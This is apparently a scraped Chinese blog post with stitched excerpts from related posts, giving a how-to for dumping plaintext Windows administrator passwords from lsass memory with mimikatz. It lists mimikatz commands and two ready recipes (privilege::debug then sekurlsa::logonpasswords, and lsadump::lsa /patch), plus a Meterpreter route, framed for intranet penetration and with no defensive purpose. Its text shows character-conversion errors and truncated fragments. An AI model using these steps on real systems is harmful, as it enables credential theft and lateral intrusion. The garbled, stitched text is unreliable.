使用mimikatz抓取windows管理員密碼

2021-10-01 15:00:16 字數 1611 閱讀 3549

mimikatz是一款功能強大的輕量級除錯神器,通過它你可以提公升程序許可權注入程序讀取程序記憶體,他可以直接從 lsass中獲取當前處於active系統的登入密碼, lsass是微軟windows系統的安全機制它主要用於本地安全和登陸策略,通常我們在登陸系統時輸入密碼之後,密碼便會儲存在 lsass記憶體中,經過其 wdigest 和 tspkg 兩個模組呼叫後,對其使用可逆的演算法進行加密並儲存在記憶體之中, 而mimikatz正是通過對lsass的逆算獲取到明文密碼!也就是說只要你不重啟電腦,就可以通過他獲取到登陸密碼,只限當前登陸系統!

注意:mimikatz的使用需要administrator許可權,否則會提權失敗。

• cls

清屏• exit

退出• version

檢視mimikatz的版本

• system::user

檢視當前登入的系統使用者

• system::computer

檢視計算機名稱

• process::list

列出程序

• process::suspend 程序名稱

暫停程序

• process::stop 程序名稱

結束程序

• process::modules

列出系統的核心模組及所在位置

• service::list

列出系統的服務

• service::remove

移除系統的服務

• service::start stop 服務名稱

啟動或停止服務

• privilege::list

列出許可權列表

• privilege::enable

啟用乙個或多個許可權

• privilege::debug

提公升許可權

• nogpo::cmd

開啟系統的cmd.exe

• nogpo::regedit

開啟系統的登錄檔

• nogpo::taskmgr

開啟任務管理器

• ts::sessions

顯示當前的會話

• ts::processes

顯示程序和對應的pid情況等

• sekurlsa::wdigest

獲取本地使用者資訊及密碼

• sekurlsa::tspkg

獲取tspkg使用者資訊及密碼

• sekurlsa::logonpasswords

獲登陸使用者資訊及密碼

操作很簡單,兩步搞定

首先需要提權:privilege::debug

然後抓取明文密碼:sekurlsa::logonpasswords

第一步依然是提公升許可權:privilege::debug

第二步抓取密碼:lsadump::lsa /patch

mimikatz2 0抓取WINDOWS密碼

看吾愛的,剛好問同事說這個也用過,以後內網滲透的話比較方便 2.0版本的只需要兩條命令就可以了,比以前版本的更簡單了。第一條 privilege debug 提公升許可權 第二條 sekurlsa logonpasswords 抓取密碼 miimkatz還可以抓遠端主機的 輸入 xx 可以檢視工具支...

mimakatz用法 使用Mimikatz讀取密碼

法一 第一條 privilege debug 提公升許可權 第二條 sekurlsa logonpasswords 抓取密碼 注 請以管理員許可權!什麼?要管理員許可權!有管理員許可權了還要你幹嘛.法二 meterreter下已整合了mimikata meterpreter load mimikat...

Mimikatz的使用心得

mimikatz是一款由法國人編寫的輕量級除錯工具,但更為人所知的是使用mimikatz來獲取windows的明文密碼。這個軟體的作者部落格 密碼 8sjl 作者部落格截圖 獲取windows明文密碼的方法 然後右鍵以管理員的方式執行mimikatz 開啟後介面是這樣的 然後輸入privilege ...